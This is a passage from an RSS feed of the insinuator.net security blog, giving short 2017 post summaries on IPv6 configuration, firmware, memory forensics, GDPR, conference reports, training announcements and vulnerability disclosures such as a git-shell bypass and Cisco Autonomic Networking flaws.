Nexus 5, 6, 6X and 6P, All iPhones after iPhone 5&lt;br&gt;&#xA;– An infected device can be used to infect other mobile devices.&lt;br&gt;&#xA;– Luckily currently there is no malware that is actively exploiting this issue.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A Life Without Vendors Binary Blobs</title>
      <link>https://insinuator.net/2017/08/a-life-without-vendors-binary-blobs/</link>
      <pubDate>Mon, 07 Aug 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/08/a-life-without-vendors-binary-blobs/</guid>
      <description>&lt;p&gt;This blogpost will be about my first steps with coreboot and libreboot and a life with as few proprietary firmware blobs as possible. My main motivation were the latest headlines about fancy firmware things like Intel ME, Computrace and UEFI backdoors. This post is not intended to be about a as much as possible hardened system or about coreboot/libreboot being more secure, but rather to be able to look into every part of software running on that system if you want to.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 RA Flags, RDNSS and DHCPv6 Conflicting Configurations Revisited</title>
      <link>https://insinuator.net/2017/07/ipv6-ra-flags-rdnss-and-dhcpv6-conflicting-configurations-revisited/</link>
      <pubDate>Mon, 17 Jul 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/07/ipv6-ra-flags-rdnss-and-dhcpv6-conflicting-configurations-revisited/</guid>
      <description>&lt;p&gt;As you may know, we published a &lt;a href=&#34;https://www.ernw.de/download/ERNW_Whitepaper_IPv6_RAs_RDNSS_DHCPv6_Conflicting_Parameters.pdf&#34;&gt;whitepaper&lt;/a&gt; discussing the behavior of different operating systems once they receive IPv6 configuration parameters from different sources two years ago. At that time, the results were quite a mess. We were curious whether the situation is still so “dire” like two years ago. We fired up the lab, updated the tested operating systems and performed the tests again.&lt;/p&gt;&#xA;&lt;p&gt;To summarize, at least in scenarios were only one router is involved, the results look way more consistent (even cross operating system) then two years ago. So we made progress on this front. Unfortunately, as soon as a second router is introduced into the segment it gets messy and the operating systems do show inconsistent behavior.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Release of Glibc Heap Analysis Plugins for Rekall</title>
      <link>https://insinuator.net/2017/07/release-of-glibc-heap-analysis-plugins-for-rekall/</link>
      <pubDate>Thu, 13 Jul 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/07/release-of-glibc-heap-analysis-plugins-for-rekall/</guid>
      <description>&lt;p&gt;I’m happy to announce the release of several Glibc heap analysis plugins (for Linux), resp. plugins to gather information from keepassx and zsh, which are now included in the &lt;a href=&#34;https://github.com/google/rekall&#34;&gt;Rekall Memory Forensic Framework&lt;/a&gt;. This blogpost will demonstrate these plugins and explain how they can be used. More detailed information, including real world scenarios, will be released after the &lt;a href=&#34;https://dfrws.org/conferences/dfrws-usa-2017/sessions/linux-memory-forensics-dissecting-user-space-process-heap&#34;&gt;talk&lt;/a&gt; at this years &lt;a href=&#34;https://dfrws.org/conferences/dfrws-usa-2017&#34;&gt;DFRWS USA&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Before being able to reliably analyze the heap of a process, a profile, for the Glibc version being used, must be provided. However, this step should for most cases be fairly simple and only consist of gathering the offset for the &lt;em&gt;mp_&lt;/em&gt; and &lt;em&gt;main_arena&lt;/em&gt; variables:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Local Packet Filtering with IPv6</title>
      <link>https://insinuator.net/2017/07/local-packet-filtering-with-ipv6/</link>
      <pubDate>Thu, 06 Jul 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/07/local-packet-filtering-with-ipv6/</guid>
      <description>&lt;p&gt;Just recently we discussed IPv6 filter rules for NIC-level firewalls (in a virtualized data center) with a customer. I’d like to take this as an opportunity to lay out potential approaches for local packet filtering of IPv6, which in turn might somewhat depend on the address configuration strategy chosen for the respective systems (for the latter you may refer to &lt;a href=&#34;https://insinuator.net/2016/12/ipv6-configuration-approaches-for-servers/&#34;&gt;this post&lt;/a&gt; or to &lt;a href=&#34;https://www.ernw.de/download/ERNW_TR17_NGI_IPv6_Config_Approach_Servers.pdf&#34;&gt;this talk&lt;/a&gt; from the &lt;a href=&#34;https://www.troopers.de/troopers17/ngi/&#34;&gt;Troopers NGI event&lt;/a&gt;).&lt;/p&gt;&#xA;&lt;p&gt;Some of this has already been discussed in &lt;a href=&#34;https://www.ietf.org/rfc/rfc4890.txt&#34;&gt;RFC 4890 Recommendations for Filtering ICMPv6 Messages in Firewalls&lt;/a&gt; but that document is from 2007 and things may have changed in the interim.&lt;br&gt;&#xA;Let’s start with a quick look at the traffic which might be of interest. We will take a server perspective here, read: which types of IPv6 traffic might have to be accepted by a host/NIC firewall in order to support proper operations? I will discuss the following, with a focus on the implications of filtering them locally:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Testing RFC 6980 Implementations of FreeBSD</title>
      <link>https://insinuator.net/2017/06/testing-rfc-6980-implementations-of-freebsd/</link>
      <pubDate>Fri, 23 Jun 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/06/testing-rfc-6980-implementations-of-freebsd/</guid>
      <description>&lt;p&gt;Following Enno’s research on “&lt;a href=&#34;https://insinuator.net/2017/03/testing-rfc-6980-implementations-with-chiron/&#34;&gt;Testing RFC 6980 Implementations with Chiron&lt;/a&gt;“, we decided to redo the experiment with FreeBSD targets.&lt;/p&gt;&#xA;&lt;p&gt;The lab setup was very similar:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;A Cisco Catalyst 3560 switch running the software “C3560c405ex-UNIVERSALK9-M” version 15.2(2)E4 connecting&lt;/li&gt;&#xA;&lt;li&gt;A Linux based attacker system running Chiron and&lt;/li&gt;&#xA;&lt;li&gt;A FreeBSD target system, running different OS versions and configurations and&lt;/li&gt;&#xA;&lt;li&gt;A Linux based laptop running a control script that remotely performed the necessary tasks on the two machines mentioned above&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;The main question was: Would the impact on the target system and the possible attacks that were observed with the Windows Server 2016 victim be reproducible on other operating systems? Or would those behave totally differently?&lt;/p&gt;</description>
    </item>
    <item>
      <title>17. Gulaschprogrammiernacht</title>
      <link>https://insinuator.net/2017/06/17.-gulaschprogrammiernacht/</link>
      <pubDate>Wed, 21 Jun 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/06/17.-gulaschprogrammiernacht/</guid>
      <description>&lt;p&gt;Over one of the recent long weekends I attended the 17th “Gulaschprogrammiernacht”, or “GPN17” for short, in Karlsruhe, the largest CCC Event after the Chaos Communication Congress with roughly a thousand attendees. The name literally translates to “goulash programming night”, which makes about as much sense as the German version. Despite the name it lasted from Thursday to Sunday, had a much wider scope than just coding and offered various other (incl. vegan) dishes besides goulash. As an active member of the CCC community I planned on attending it anyway, but submitted my talk about Automated Binary Analysis in case there was interest. I didn’t anticipate that much interest given that it was a fairly theoretical IT-Security topic at an event that was not focused on IT-Security, but nonetheless the hall was filled with people from various backgrounds like math, formal verification and software optimization. The talk was an improved version of the one I gave at &lt;a href=&#34;https://insinuator.net/2017/03/csa-summit-cee-and-bsides-ljubljana-2017/&#34;&gt;Bsides Ljubljana&lt;/a&gt;, incorporating feedback I received and new things I had learned since then. The English slides are available &lt;a href=&#34;https://entropia.de/images/b/bb/Binary-analysis-v2.2.pdf&#34;&gt;here&lt;/a&gt;, the recording of the talk in German can be found &lt;a href=&#34;https://media.ccc.de/v/gpn17-8585-introduction_to_automated_binary_analysis&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>GDPR and Pseudonymisation – Easing the Pain of Regulation</title>
      <link>https://insinuator.net/2017/06/gdpr-and-pseudonymisation-easing-the-pain-of-regulation/</link>
      <pubDate>Wed, 21 Jun 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/06/gdpr-and-pseudonymisation-easing-the-pain-of-regulation/</guid>
      <description>&lt;p&gt;27 April 2016 marked a turning point for a lot of countries as well as a lot businesses worldwide: EU regulation 2016/679 (going by it’s more widely known name General Data Protection Regulation and abbreviated GDPR) was adopted by the European Parliament, the Council as well as the Commission [1]. Especially readers from countries outside of the EU might ask “Why should this be of interest for me?”.&lt;/p&gt;&#xA;&lt;p&gt;The point is: if your business is dealing with data of EU citizens (e.g. because you are having an online shop selling goods in the EU, or you operate a social network platform with customers that are EU citizens) you are liable under GDPR – this is regulated in Article 3, section 2 of the regulation: &lt;em&gt;“This Regulation applies to the processing of personal data of data subjects residing in the Union by a controller not established in the Union, where the processing activities are related to:&lt;/em&gt;&lt;br&gt;&#xA;&lt;em&gt;(a) the offering of goods or services to such data subjects in the Union; or&lt;/em&gt;&lt;br&gt;&#xA;&lt;em&gt;(b) the monitoring of their behaviour.”&lt;/em&gt;&lt;br&gt;&#xA;I’d guess that if you are reading these lines you become aware (if not have been so before) that your business might most probably be affected by GDPR as well. Now, the purpose of this blog post is not to enlighten you on the basics of GDPR but to discuss one special, interesting aspect of this regulation: pseudonymisation and how it might support your way to become compliant with GDPR.&lt;/p&gt;</description>
    </item>
    <item>
      <title>DevOps, Continuous Deployment &amp; Agile Security September 7, 2017</title>
      <link>https://insinuator.net/2017/06/devops-continuous-deployment-agile-security-september-7-2017/</link>
      <pubDate>Thu, 08 Jun 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/06/devops-continuous-deployment-agile-security-september-7-2017/</guid>
      <description>&lt;p&gt;&lt;em&gt;The following post is in German as it is covering an Event with German as the main language.&lt;/em&gt;&lt;/p&gt;&#xA;&lt;hr&gt;&#xA;&lt;p&gt;&lt;strong&gt;INSIGHT SUMMIT 2017 präsentiert DevOps, Continuous Deployment &amp;amp; Agile Security&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;Inspiriert durch die erfolgreichen Round Table Session der TROOPERS freuen wir uns Ihnen heute mit dem AgileSecurity Insight Summit 2017 eine weitere Veranstaltung in einer Reihe zu Trend-Themen im Bereich der IT-Sicherheit vorzustellen.&lt;/p&gt;&#xA;&lt;p&gt;Die Veranstaltung beginnt am Morgen mit einer Keynote, gefolgt von Fallstudien und Vorträgen durch interne und externe Referenten aus der Industrie. Im Anschluss werden alle Teilnehmer in zwei Gruppen aufgeteilt, die nacheinander an beiden Round-Table Sessions teilnehmen. In den Round-Table Sessions werden unter Expertenmoderation typische Problemstellungen und Lösungsansätze diskutiert.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Docker Security &amp; (Sec) DevOps Training July 19-20th</title>
      <link>https://insinuator.net/2017/06/docker-security-sec-devops-training-july-19-20th/</link>
      <pubDate>Mon, 05 Jun 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/06/docker-security-sec-devops-training-july-19-20th/</guid>
      <description>&lt;p&gt;&lt;em&gt;The following post is in German as it is covering a Training with German as the main language.&lt;/em&gt;&lt;/p&gt;&#xA;&lt;hr&gt;&#xA;&lt;p&gt;&lt;strong&gt;Professionelles Training im Workshop Character:&lt;/strong&gt;&lt;br&gt;&#xA;Docker, Microservices, Kubernetes, DevOps, Continuous&lt;br&gt;&#xA;Integration/Deployment/Delivery (CI/CD), Container – moderne&lt;br&gt;&#xA;Entwicklungsprozesse kommen nicht mehr ohne diese Begriffe aus. In diesem Kurs&lt;br&gt;&#xA;lernen Sie die Security Grundlagen um diese Dinge zu beherschen.&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Docker Security &amp;amp; (Sec) DevOps Training:&lt;/strong&gt;&lt;br&gt;&#xA;Im Training werden unter Anderem die folgenden Fragestellungen behandelt:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Wie stark/zuverlässig sind die Isolationsmechanismen hinter Docker/Linux/Betriebssystem-Containern?&lt;/li&gt;&#xA;&lt;li&gt;Wie beeinflussen Container typische Applikations- und Netzwerk-Landschaften?&lt;/li&gt;&#xA;&lt;li&gt;Wie beeinflussen die CI/CD/Microservice Paradigmen traditionelle Entwicklungsprozesse?&lt;/li&gt;&#xA;&lt;li&gt;Wie sieht eine typische CI/CD Pipeline aus?&lt;/li&gt;&#xA;&lt;li&gt;Was sind potentielle Schnittstellen zwischen „Security“ und diesen Paradigmen?&lt;/li&gt;&#xA;&lt;li&gt;Welche zusätzlichen Security-Herausforderungen ergeben sich aus der veränderten Entwicklungslandschaft und neuen Tool-Chains?&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;&lt;strong&gt;Voraussetzungen:&lt;/strong&gt;&lt;br&gt;&#xA;Die Teilnehmer sollten grundlegende Kenntnisse der Linux Kommandozeile besitzen&lt;br&gt;&#xA;sowie ein System mit einem SSH Client. Teilnehmer die die Demo-VM gerne selbst&lt;br&gt;&#xA;betreiben möchten erhalten diese auf einem USB-Stick, müssen sich aber selbst um&lt;br&gt;&#xA;Import und Start kümmern.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Active Directory Security &amp; Secure Operations July 18, 2017</title>
      <link>https://insinuator.net/2017/06/active-directory-security-secure-operations-july-18-2017/</link>
      <pubDate>Thu, 01 Jun 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/06/active-directory-security-secure-operations-july-18-2017/</guid>
      <description>&lt;p&gt;&lt;em&gt;The following post is in German as it is covering an Event with German as the main language.&lt;/em&gt;&lt;/p&gt;&#xA;&lt;hr&gt;&#xA;&lt;p&gt;&lt;strong&gt;INSIGHT SUMMIT 2017 präsentiert Active Directory Security &amp;amp; Secure Operations&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;Inspiriert durch die erfolgreichen Round Table Sessions der TROOPERS freuen wir uns Ihnen heute mit dem Active Directory Insight Summit 2017 eine weitere Veranstaltung in einer Reihe zu Trend-Themen im Bereich der IT-Sicherheit vorzustellen.&lt;br&gt;&#xA;Die Veranstaltung beginnt am Morgen mit einer Hinführung zum Thema Active Directory Sicherheit gefolgt von Fallstudien und Vorträgen durch interne und externe Referenten aus Wirtschaft und Industrie. Im Anschluss werden alle Teilnehmer in zwei Gruppen aufgeteilt, die nacheinander an beiden Round Table Sessions teilnehmen (jeder Teilnehmer kann an beiden Sessions teilnehmen). In den Round Table Sessions werden unter Expertenmoderation typische Problemstellungen und Lösungsansätze diskutiert.&lt;/p&gt;</description>
    </item>
    <item>
      <title>6th No-Spy Conference</title>
      <link>https://insinuator.net/2017/05/6th-no-spy-conference/</link>
      <pubDate>Mon, 22 May 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/05/6th-no-spy-conference/</guid>
      <description>&lt;p&gt;Last friday Florian and me attended the &lt;a href=&#34;https://no-spy.org/prismcamp/&#34;&gt;6th No-Spy Conference&lt;/a&gt; in Stuttgart, Germany. We gave a talk about surveillance and censorship on modern devices in North Korea and discussed various aspects with the attendees. The atmosphere was very welcoming and we had some nice discussions about various topics which allowed us to better clarify some things. The slides are available &lt;a href=&#34;https://www.ernw.de/download/nospy6_exploring_north_koreas_survelliance_technology.pdf&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Thanks to the organizers for having us!&lt;/p&gt;</description>
    </item>
    <item>
      <title>Looking back on RIPE 74</title>
      <link>https://insinuator.net/2017/05/looking-back-on-ripe-74/</link>
      <pubDate>Fri, 19 May 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/05/looking-back-on-ripe-74/</guid>
      <description>&lt;p&gt;From May 8th to 12th I was able to attend the 74th RIPE meeting in Budapest, Hungary. Being rather new to the networking community, I enjoyed learning a lot of different things, not only from the various interesting talks but also from inspiring conversations with a variety of people from all areas during the beautiful social events.&lt;/p&gt;&#xA;&lt;p&gt;As it was the first RIPE meeting for me, I was very thankful for the “Newcomer’s Introduction” on Monday morning, containing a RIPE and RIPE NCC 101. It was quite helpful to get into the mindset and understand the structure of the meeting, like the division into different working groups based on the participants’ interests. After familiarizing myself with the concept, I chose to attend several sessions on Address Policy, IPv6, Routing, Open Source, and DNS working groups besides the general plenary sessions. I’ll be reviewing those sessions here.&lt;/p&gt;</description>
    </item>
    <item>
      <title>RIPE74 / Why IPv6 Security Is So Hard</title>
      <link>https://insinuator.net/2017/05/ripe74-/-why-ipv6-security-is-so-hard/</link>
      <pubDate>Fri, 12 May 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/05/ripe74-/-why-ipv6-security-is-so-hard/</guid>
      <description>&lt;p&gt;I’m on my way back from the &lt;a href=&#34;https://ripe74.ripe.net/&#34;&gt;RIPE74 meeting in Budapest&lt;/a&gt;. It was a great event: quite a few nice technical talks in the plenary, productive working group meetings and some really good hallway discussions.&lt;br&gt;&#xA;Big thanks to the RIPE NCC team for the smooth organization and for taking care of us!&lt;/p&gt;&#xA;&lt;p&gt;Here’s some stuff I found particularly interesting:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Andrew Alston’s take on “Anti-Shutdown Policies” (&lt;a href=&#34;https://ripe74.ripe.net/presentations/34-anti-shutdown-ripe.pdf&#34;&gt;slides&lt;/a&gt; and &lt;a href=&#34;https://ripe74.ripe.net/archives/video/41/&#34;&gt;video&lt;/a&gt; incl. extensive mic discussion)&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://twitter.com/pberndro&#34;&gt;Philip&lt;/a&gt; &amp;amp; &lt;a href=&#34;https://twitter.com/BarbarossaTM&#34;&gt;Maximilian&lt;/a&gt; from &lt;a href=&#34;https://www.freifunk-rheinland.net/&#34;&gt;Freifunk Rheinland&lt;/a&gt; on their efforts (&lt;a href=&#34;https://ripe74.ripe.net/presentations/46-as201701-ripe74.pdf&#34;&gt;slides&lt;/a&gt;, &lt;a href=&#34;https://ripe74.ripe.net/archives/video/47/&#34;&gt;video&lt;/a&gt;)&lt;/li&gt;&#xA;&lt;li&gt;Friso Feenstra on “That’s Why Rabobank Implemented IPv6” (&lt;a href=&#34;https://ripe74.ripe.net/presentations/3-That-is-why-Rabobank-has-IPv6.pdf&#34;&gt;slides&lt;/a&gt;, video) plus some insight into their address planning (&lt;a href=&#34;https://ripe74.ripe.net/presentations/4-Rabobank-corporate-IPv6-numberplan.pdf&#34;&gt;slides&lt;/a&gt;, &lt;a href=&#34;https://ripe74.ripe.net/archives/video/101/&#34;&gt;video&lt;/a&gt;)&lt;/li&gt;&#xA;&lt;li&gt;BCOP work on “&lt;a href=&#34;https://ripe74.ripe.net/presentations/132-Jan_Zorz-IPv6-prefix-delegations-BCOP-v-2.pdf&#34;&gt;IPv6 Prefix Assignments/Prefix Delegation&lt;/a&gt;” and “&lt;a href=&#34;https://ripe74.ripe.net/presentations/40-jan_zorz_IPv6-for-hosting-providers.pdf&#34;&gt;IPv6 Assignments for Hosting Providers&lt;/a&gt;“&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://twitter.com/lundstromjerry&#34;&gt;Jerry Lundström&lt;/a&gt;‘s DNS Replay Tool (&lt;a href=&#34;https://ripe74.ripe.net/presentations/79-RIPE74-DNSWG-drool.pdf&#34;&gt;slides&lt;/a&gt;, &lt;a href=&#34;https://ripe74.ripe.net/archives/video/161/&#34;&gt;video&lt;/a&gt;, &lt;a href=&#34;https://github.com/DNS-OARC/drool&#34;&gt;code&lt;/a&gt;)&lt;/li&gt;&#xA;&lt;li&gt;Jan Žorž (supported by Sander Steffann) on NAT64 testing (&lt;a href=&#34;https://ripe74.ripe.net/presentations/133-Jan_Zorz-NAT64-Check-v3.4.pdf&#34;&gt;slides&lt;/a&gt;, &lt;a href=&#34;https://ripe74.ripe.net/archives/video/160/&#34;&gt;video&lt;/a&gt;, &lt;a href=&#34;https://github.com/sjm-steffann/nat64check&#34;&gt;code&lt;/a&gt;)&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;These were my own contributions:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Git Shell Bypass By Abusing Less (CVE-2017-8386)</title>
      <link>https://insinuator.net/2017/05/git-shell-bypass-by-abusing-less-cve-2017-8386/</link>
      <pubDate>Wed, 10 May 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/05/git-shell-bypass-by-abusing-less-cve-2017-8386/</guid>
      <description>&lt;p&gt;The &lt;em&gt;git-shell&lt;/em&gt; is a restricted shell maintained by the git developers and is meant to be used as the upstream peer in a git remote session over a ssh tunnel. The basic idea behind this shell is to restrict the allowed commands in a ssh session to the ones required by git which are as follows:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&lt;em&gt;git-receive-pack&lt;/em&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Receives repository updates from the client.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;&lt;em&gt;git-upload-pack&lt;/em&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Pushes repository updates to the client.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;&lt;em&gt;git-upload-archive&lt;/em&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Pushes a repository archive to the client.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;Besides those built-in commands, an administrator can also provide it’s own commands via shell scripts or other executable files. As those are typically completely custom, this post will concentrate on the built-in ones.&lt;/p&gt;</description>
    </item>
    <item>
      <title>One Step Closer –  RDNSS (RFC 8106) Support in Windows 10 Creators Update</title>
      <link>https://insinuator.net/2017/05/one-step-closer-rdnss-rfc-8106-support-in-windows-10-creators-update/</link>
      <pubDate>Mon, 08 May 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/05/one-step-closer-rdnss-rfc-8106-support-in-windows-10-creators-update/</guid>
      <description>&lt;p&gt;Good Afternoon,&lt;/p&gt;&#xA;&lt;p&gt;It is a pleasant surprise for many (us included) that Microsoft implemented support for the RDNSS (&lt;a href=&#34;https://tools.ietf.org/html/rfc8106&#34;&gt;RFC 8106&lt;/a&gt;) option in Router Advertisements beginning with the &lt;a href=&#34;https://blogs.technet.microsoft.com/windowsitpro/2017/04/05/whats-new-for-it-pros-in-the-windows-10-creators-update/&#34;&gt;Windows 10 Creators Update&lt;/a&gt;. Interestingly, I wasn’t able to find any official documents from Microsoft stating this. As we are involved in a lot of IPv6 related projects for our customers, the lack of RDNSS support for Windows and DHCPv6 for Android is a major pain point when implementing IPv6 in mixed client segments, as you need to implement both mechanisms to ensure that all clients do get the relevant network parameters. I won’t beat on the dead horse, but Microsoft’s decision is a huge step in the right direction and one can hope that one day Google finds a “compelling use case” to implement at least stateless DHCPv6 for Android.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Autonomic Network Part 3: Vulnerabilities</title>
      <link>https://insinuator.net/2017/04/autonomic-network-part-3-vulnerabilities/</link>
      <pubDate>Thu, 13 Apr 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/04/autonomic-network-part-3-vulnerabilities/</guid>
      <description>&lt;p&gt;This is the 3rd post in the series of Autonomic Network (AN), it will dedicated for discussing the vulnerabilities. I recommend reading the first 2 parts (&lt;a href=&#34;https://insinuator.net/2017/03/autonomic-network-overview/&#34;&gt;part one&lt;/a&gt;, &lt;a href=&#34;https://insinuator.net/2017/03/autonomic-network-analysis/&#34;&gt;part two&lt;/a&gt;) to be familiar with the technology and how the proprietary protocol is constructed.&lt;/p&gt;&#xA;&lt;p&gt;Initially we will discuss 2 of the reported CVEs, but later there is more CVEs to come 😉&lt;/p&gt;&#xA;&lt;p&gt;Here is a quick overview on how our network looks like for 2 CVEs&lt;/p&gt;</description>
    </item>
    <item>
      <title>(Mostly) New, Interesting, and Security-focused Open Source Projects</title>
      <link>https://insinuator.net/2017/04/mostly-new-interesting-and-security-focused-open-source-projects/</link>
      <pubDate>Mon, 03 Apr 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/04/mostly-new-interesting-and-security-focused-open-source-projects/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;http://www.troopers.de/&#34;&gt;Troopers ’17&lt;/a&gt; – the 10th edition – madness is over and hopefully all of you are well rested and recovered after this special week. Of course the rest of the world did not stand still and thus Google lifted the curtains on a new public portal collecting and promoting the Open Source Software projects developed by employees of Google: &lt;a href=&#34;http://opensource.google.com/&#34;&gt;opensource.google.com&lt;/a&gt;. There are a lot of interesting projects that might incubate new interesting developments. And even security oriented tools and projects (51 at the time of writing to be precise) are publically available [1].&lt;/p&gt;</description>
    </item>
    <item>
      <title>Some Quick Tips for Submitting a Talk to Black Hat or TROOPERS</title>
      <link>https://insinuator.net/2017/04/some-quick-tips-for-submitting-a-talk-to-black-hat-or-troopers/</link>
      <pubDate>Sat, 01 Apr 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/04/some-quick-tips-for-submitting-a-talk-to-black-hat-or-troopers/</guid>
      <description>&lt;p&gt;Given the &lt;a href=&#34;https://www.blackhat.com/us-17/call-for-papers.html&#34;&gt;CfP for Black Hat US&lt;/a&gt; in Vegas ends in a few days – and as apparently &lt;a href=&#34;https://twitter.com/HashtagCyber/status/846093463120678913&#34;&gt;some&lt;/a&gt; &lt;a href=&#34;https://twitter.com/christruncer/status/845213468269662209&#34;&gt;people&lt;/a&gt; have already started to think about their TR18 submissions – I’ll quickly provide some loose recommendations on how to write a submission here. There’s quite some reasonable advice out there already (the BH CfP site lists &lt;a href=&#34;https://www.helpnetsecurity.com/2016/03/30/how-to-get-your-talk-accepted-at-black-hat/&#34;&gt;this&lt;/a&gt; and &lt;a href=&#34;http://hexsec.blogspot.de/2012/12/create-good-security-cfp-responses.html&#34;&gt;this&lt;/a&gt; which you should both read as well) but some of you might find it useful to get (yet) another perspective.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Autonomic Networking – Part 2: Analysis</title>
      <link>https://insinuator.net/2017/03/autonomic-networking-part-2-analysis/</link>
      <pubDate>Mon, 20 Mar 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/03/autonomic-networking-part-2-analysis/</guid>
      <description>&lt;p&gt;This is the second part in the Autonomic Network series. We have introduced previously in our &lt;a href=&#34;https://insinuator.net/2017/03/autonomic-network-overview/&#34;&gt;first part&lt;/a&gt; the Autonomic Network (AN), took a look about the needed configuration to run it on Cisco gear and what is the expected communication flow. In this post, we will dive deeper to have a closer look on the packets and how they are composed. Cisco’s AN protocol is a proprietary one and as far as I know, the analysis provided here for the protocol is the first of its kind.&lt;/p&gt;</description>
    </item>
    <item>
      <title>This is Why Your Wireless Mouse Should Have a Tail and Your Presenter is a Fail</title>
      <link>https://insinuator.net/2017/03/this-is-why-your-wireless-mouse-should-have-a-tail-and-your-presenter-is-a-fail/</link>
      <pubDate>Mon, 20 Mar 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/03/this-is-why-your-wireless-mouse-should-have-a-tail-and-your-presenter-is-a-fail/</guid>
      <description>&lt;p&gt;Puh…it’s been a long time since my &lt;a href=&#34;https://insinuator.net/2016/11/itsecx-2016-pulling-an-all-nighter-in-austria/&#34;&gt;last post&lt;/a&gt;, huh?&lt;br&gt;&#xA;However, let’s get straight back to topic. Today, I want to issue a warning, especially in face of upcoming &lt;a href=&#34;https://www.troopers.de/troopers17/&#34;&gt;Troopers 2017&lt;/a&gt; (less than two days to go, wooo! 10th anniversary!): be careful when using wireless equipment (presenters, mouses, keyboards,…), especially during Troopers, but also in daily use.&lt;/p&gt;&#xA;&lt;p&gt;TL;DR Please take into account that you put your laptop at risk of being hacked by using wireless equipment during &lt;a href=&#34;https://www.troopers.de/&#34;&gt;Troopers&lt;/a&gt;. This could lead to a full system compromise. Wirelessly. Attacks like keystroke injection or sniffing of latter and mouse movements are possible. This, e.g. applies to speakers, using wireless presenters (like Logitech R400/R800, old and new models), as also to any attendee or crew member who might use wireless mouses or keyboards. Be aware of this!&lt;/p&gt;</description>
    </item>
    <item>
      <title>Autonomic Networking – Part 1: Overview</title>
      <link>https://insinuator.net/2017/03/autonomic-networking-part-1-overview/</link>
      <pubDate>Sun, 19 Mar 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/03/autonomic-networking-part-1-overview/</guid>
      <description>&lt;p&gt;This is a 3-part series which introduces and analyzes Cisco’s implementation for Autonomic Network. In the 1st part, the technology is introduced and we have an overview about communication flow. In the &lt;a href=&#34;https://insinuator.net/2017/03/autonomic-network-analysis/&#34;&gt;2nd part&lt;/a&gt;, Cisco’s proprietary protocol is reverse engineered ? then finally in the &lt;a href=&#34;https://insinuator.net/2017/04/autonomic-network-vulnerabilities/&#34;&gt;3rd part&lt;/a&gt;, multiple vulnerabilities will be disclosed for the first time. If you’re aware of the technology, you can skip directly to part 2 where the action begins! &lt;/p&gt;</description>
    </item>
    <item>
      <title>CSA Summit CEE and BSides Ljubljana 2017</title>
      <link>https://insinuator.net/2017/03/csa-summit-cee-and-bsides-ljubljana-2017/</link>
      <pubDate>Fri, 17 Mar 2017 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2017/03/csa-summit-cee-and-bsides-ljubljana-2017/</guid>
